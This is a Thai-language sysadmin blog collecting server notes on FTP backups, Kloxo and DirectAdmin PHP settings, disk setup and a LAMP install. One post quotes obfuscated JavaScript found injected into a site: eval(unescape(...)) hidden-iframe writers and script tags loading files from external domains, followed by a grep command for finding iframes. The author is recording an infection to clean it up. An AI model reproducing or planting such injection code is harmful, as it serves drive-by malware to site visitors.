Server

Server

ftp with tar

โดย Little Bear on 10 มี.ค. 55 11:04

ftp> put "|tar cfz - /var/lib/mysql" backup.tar.gz

ที่มา directadmin.com , webmasters-central.com

Kloxo : admin PHP config is not applied to all customers

โดย Little Bear on 1 ก.พ. 55 14:08

ปัญหา : เวลาเปลี่ยน PHP Config แล้วจะมีการเขียนลงไน .htaccess แต่ค่าที่เขียน ไม่ใช่ค่าที่ถูกต้อง มันไปเอาค่า phpvalue uploadmax_filesize 2M มาจากไหนก็ไม่รู้เขียนลงไป ปัญหาเลยเกิด

คำแนะนำ (อย่างใดอย่างหนึ่ง)

 1. แก้ไขเองในไฟล์ /usr/local/lxlabs/kloxo/file/phpini/htaccesstemp เป็น phpvalue uploadmax_filesize 128M

 2. มันเป็น bug ของ Kloxo If a client changes advanced PHP settings, then the website gives a blank page ลองแล้ว ไม่หาย

 3. ลบไฟล์ /usr/local/lxlabs/kloxo/file/phpini/htaccesstemp ทิ้งไปเสียเลย มันจะได้เอาค่าจากการตั้งของ admin มาใช้ แต่จะทำให้ไม่สามารถกำหนดให้กับแต่ละโดเมนได้

ที่มา admin PHP config is not applied to all customers , If a client changes advanced PHP settings, then the website gives a blank page , Clients can edit php configuration

Keyword : .htaccess was change after click Advanced php config on Kloxo , Google

เลิกใช้ swap เถอะ

โดย Little Bear on 24 พ.ย. 54 02:38

มีคนแนะนำว่าให้เลิกใช้ swap หาก RAM หมด ก็ปล่อยให้มันเดี้ยง ดีกว่าให้มันเขียนลง swap วันนี้ก็เลยลองของสักหน่อย พรุ่งนี้ก็จะรู้ผล

วิธีการคือ

ปิดมันทุก swap

root@god# swapoff -a

ปิด swap เฉพาะ

root@god# swapoff /dev/partition

โดยดู partition จาก

root@god# fdisk -l

หากอยากให้ปิดถาวรก็ต้องแก้ไขใน /etc/fstab

ดูสถานะระบบ

โดย Little Bear on 20 ก.ย. 54 22:25

ตอนนี้ server มีปัญหาเรื่อง Load ในบางช่วงที่สูงผิดปกติ แต่ยังหาสาเหตุไม่เจอ

คุณ icez เขียนเรื่อง เครื่องมือดูสถานะระบบอย่างละเอียด (centos) ไว้ที่ thaihosttalk.com เลยขอเอาลิงก์มาเก็บไว้ก่อน ไว้ค่อยเขียนรายละเอียดอีกที

Direactadmin : สร้าง php.ini สำหรับแต่ละคน

โดย Little Bear on 4 ส.ค. 54 14:13

suPHP และ PHP cgi ไม่สามารถเปลี่ยนค่า config โดย .htaccess ได้ จึงต้องใช้วิธีการเพิ่ม config โดยให้ php ไปอ่านจากไฟล์เพิ่มเติม

เริ่มด้วยการสร้างไฟล์ php.ini ไว้ใน /usr/local/directadmin/data/users/(username)/php/php.ini

แล้วเพิ่มใน Apache ว่า

SetEnv PHP_INI_SCAN_DIR /usr/local/directadmin/data/users/|USER|/php/

ที่มา DirectAdmin

Enable Exif

โดย Little Bear on 27 ก.ค. 54 14:57

Enter /usr/local/directadmin/custombuild ("cd /usr/local/directadmin/custombuild").

If you use PHP5 CLI, create the directory custom/ap2 ("mkdir -p custom/ap2"), then copy configure/ap2/configure.php5 to custom/ap2/configure.php5.

If you use PHP5 CGI, create the directory custom/suphp ("mkdir -p custom/suphp"), then copy configure/suphp/configure.php5 to custom/suphp/configure.php5.

Open the copied file and add "--enable-exif" to the list. Remember that there must be a "\" at the very end of every line but the last one.

Reinstall php ("./build php n").Thanks for your help, that did the trick! Now I now this for the next time when I need to enable or install an plugin:)Thanks again!

ที่มา : DirectAdmin

เพิ่ม Harddisk ใหม่อีกสักลูก ทำอย่างไรดี?

โดย Little Bear on 22 ก.ค. 54 21:46

นาน ๆ ถึงจะได้ทำสักที ขอนำมาเก็บไว้ก่อนก็แล้วกัน

 1. ทำการเพิ่ม HDD ถ้าระบบรองรับ hotswap ก็เสียบเข้าไปเลยไม่ต้อง shutdown แต่ถ้าไม่รองรับหรือไม่มี hdd bay แบบเสียบได้เลยก็คงต้องปิดเครื่องก่อนแหละ

 2. เมื่อเพิ่ม hdd เสร็จแล้ว ก็เปิดเครื่อง login เข้า root (ตอน boot อาจจะแวะเข้า bios ตรวจสอบว่าระบบมองเห็น hdd ที่เพิ่มเข้าไป)

 3. โดยปกติ hdd ที่เพิ่มเข้าไปก็จะเป็น sdb หรือ sdc สำหรับลูกที่ 2 และ 3 ตามลำดับ

 4. สร้าง partition ด้วยคำสั่ง fdisk

  root@god# fdisk /dev/sdb
  กด p ดู partition ที่มีอยู่ ปกติ hdd ใหม่จะไม่มี partition แต่บางตัวก็จะมี utility partition ขนาดเล็กๆอยู่ ถ้ามีก็ลบออก แล้วสร้าง partition ตามต้องการ

  • d ลบ partition
  • n สร้าง partition
  • t กำหนด type ของ partition เสร็จแล้วกด w เพื่อบันทึก และออกจากโปรแกรมด้วย q
 5. format partiton ที่สร้างขึ้นใหม่

  root@god# mke2fs -j /dev/sdb1
  หรือ
  root@god# mkfs -t ext3 /dev/sdb1

 6. mount partition เข้าระบบ

  root@god# mkdir /backup
  root@god# mount /dev/sdb1 /backup
  

 7. อาจจะกำหนด label ให้ partition ที่สร้างใหม่

  root@god# e2label /dev/sdb1 /backup

 8. เพิ่มเข้าไปใน /etc/fstab เพื่อให้ mount ทุกครั้งที่ boot เครื่อง

  /dev/sdb1 /backup ext3 defaults 1 2

  หรืออ้างตามชื่อ label
  LABEL=/backup /backup ext3 defaults 1 2

ที่มา ThaiHostTalk.com - จะเพิ่ม HD ลูกที่ 2 ใน CentOS ต้องทำอะไรบ้างครับ

น่าจะโดนฝัง code

โดย Little Bear on 17 ก.ค. 54 15:43

โค๊ดเป็นตามนี้

<สคริปท์ >eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%76%62%2E%63%6F%6D%2F%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));< /สคริปท์> <สคริปท์>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%65%61%63%76%62%2E%63%6F%6D%2F%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));< /สคริปท์ >

และ

<สคริปท์ type="text/javascript" src="http://project-pc.it/jtoolsmini.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://witteveenreclame.nl/cssminibar.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://soorajmull.net/sidename.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://jigneshpatel.co.in/sidename.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://microstart.net/counter.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://9fox.biz/jtoolsmini.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://nicolaszuliani.com.ar/cssminibar.js"> < /สคริปท์> <สคริปท์ type="text/javascript" src="http://eugeniasilva.eu/sidename.js">< /สคริปท์>
<สคริปท์ type="text/javascript" src="http://pointgraphics.ie/counter.js">< /สคริปท์>

ยังไม่ได้ตามดูอย่างละเอียด

Code สำหรับจัดการกับไฟล์หลาย ๆ ไฟล์

โดย Little Bear on 17 ก.ค. 54 15:16

เปลี่ยน permission ของโฟลเดอร์เป็น 711 และ ไฟล์เป็น 644

สำหรับเว็บไซท์ที่ใช้ suPHP ส่วน code บรรทัดแรกยังไม่รู้เหมือนกันว่าทำอะไร ส่วนบรรทัดสุดท้ายนั้นจะเปลี่ยน owner/group ให้เป็นของแต่ละคน ซึ่งอาจจะไม่จำเป็น

cd /usr/local/directadmin/scripts && ./set_permissions.sh user_homes
find /home/*/domains/*/public_html -type d -print0 | xargs -0 chmod 711
find /home/*/domains/*/public_html -type f -print0 | xargs -0 chmod 644
cd /usr/local/directadmin/data/users && for i in `ls`; do { chown -R $i:$i /home/$i/domains/*/public_html;}; done;

หาคำในไฟล์

ในที่นี้จะเป็นการหาคำว่า iframe แล้วบันทึกเก็บไว้ในไฟล์ iframe.txt

find /home/*/domains/*/public_html/ -maxdepth 100 -name *index* -exec grep -H "iframe" {} ";" > iframe.txt

Make Ubuntu to be a web server (LAMP)

โดย Little Bear on 21 มิ.ย. 54 12:33

ติดตั้ง Ubuntu Desktop ให้เป็น Server (LAMP)

ผ่านไป 2 ปี ก็ถึงเวลาต้องติดตั้ง Ubuntu ใหม่เสียที คราวนี้เลยถือโอกาสเปลี่ยนเป็น Ubuntu 11.04 64 bit ไปเลย ก็เลยลองมารีวิวการติดตั้ง LAMP บน Ubuntu ใหม่ว่ามีอะไรที่เปลี่ยนแปลงไปบ้าง

หมายเหตุ : การติดตั้งต่อไปนี้ใช้สิทธิ์ของ root ขอให้เข้าสู่สิทธิ์ของ root โดยการเปิด terminal แล้วพิมพ์ sudo su

Install L.A.M.P Stack (Apache, Mysql, PHP) ทีเดียวซะเลย

root@god:/# apt-get install lamp-server^

แล้วก็ลง phpMyAdmin

root@god:/# apt-get install phpmyadmin

เลือก Apache แล้ว YES สำหรับ dbconfig-common.

ติดตั้งเพิ่มเติม

php5-curl

root@god# apt-get install php5-curl

หรือชอบที่จะลงทีละตัว ก็

Install Apache

root@god:/# apt-get install apache2

Enable mod_rewrite

root@god:/# a2enmod rewrite

เปลี่ยน DocumentRoot ของ apache เป็น folder อื่น และเปิดใช้งาน clean url

root@god:/# nano /etc/apache2/sites-available/default
 • เปลี่ยนบรรทัด /var/www/ เป็น /my web folder/ จำนวน 2 ตำแหน่ง
 • แก้ค่า AllowOverride ของ /my web folder/ จาก None เป็น AllowOverride All

Install PHP

root@god:/# apt-get install php5 libapache2-mod-php5 php5-gd
root@god:/# /etc/init.d/apache2 restart

Install MySQL

root@god:/# apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin
root@god:/# /etc/init.d/apache2 restart

หากมีข้อมูลเก่าของ mysql ก็สามารถ copy มาไว้ที่ /var/lib/mysql แล้ว โดยใช้คำสั่ง

root@god:/# cp /media/disk/var/lib/mysql/* /var/lib/mysql/
root@god:/# chown -hR mysql /var/lib/mysql/*
root@god:/# chgrp -hR mysql /var/lib/mysql/*

ย้ายข้อมูล mysql ไปไว้ที่อื่น

root@god:/# /etc/init.d/mysql stop
root@god:/# mkdir /home/mysql
root@god:/# chown -R mysql:mysql /home/mysql
root@god:/# cp -r /var/lib/mysql/mysql /home/mysql/
root@god:/# chown -R mysql:mysql /home/mysql/*

แล้วแก้ my.cnf

root@god:/# nano /etc/mysql/my.cnf

หาคำนี้ให้เจอ :

datadir = /var/lib/mysql

แล้วเปลี่ยนเป็นตำแหน่งใหม่ :

datadir = /home/mysql

เสร็จแล้วก็ restart mysql service

root@god:/# /etc/init.d/mysql start
Starting MySQL database server mysqld [ OK ]

แล้ว mysql จะทำการสร้างไฟล์ ibdata1, ib_logfile0, อื่น ๆ ขึ้นมาใหม่

ทุกอย่างน่าจะเรียบร้อย แต่ผมไม่สามารถ start mysql ได้ มันค้างอยู่ เลยต้องไปแก้ค่าในไฟล์ /etc/apparmor.d/usr.sbin.mysqld โดยเปลี่ยนค่า /var/lib/mysql ให้เป็น /home/mysql ด้วย

แล้วคราวนี้ก็ทำการ copy ฐานข้อมูลเก่า ๆ มาได้เลย อย่าลืมเปลี่ยน owner/group เป็น mysql ด้วยนะ

ที่มา

#sudo apt-get install apache2 apache2-doc apache2-mpm-prefork apache2-utils libexpat1 ssl-cert
<a class="hashtag" href="/tags/sudo">#sudo</a> apt-get install libapache2-mod-php5 php5 php5-common php5-curl php5-dev php5-gd php5-idn php-pear php5-imagick php5-imap php5-json php5-mcrypt php5-memcache php5-mhash php5-ming php5-mysql php5-ps php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl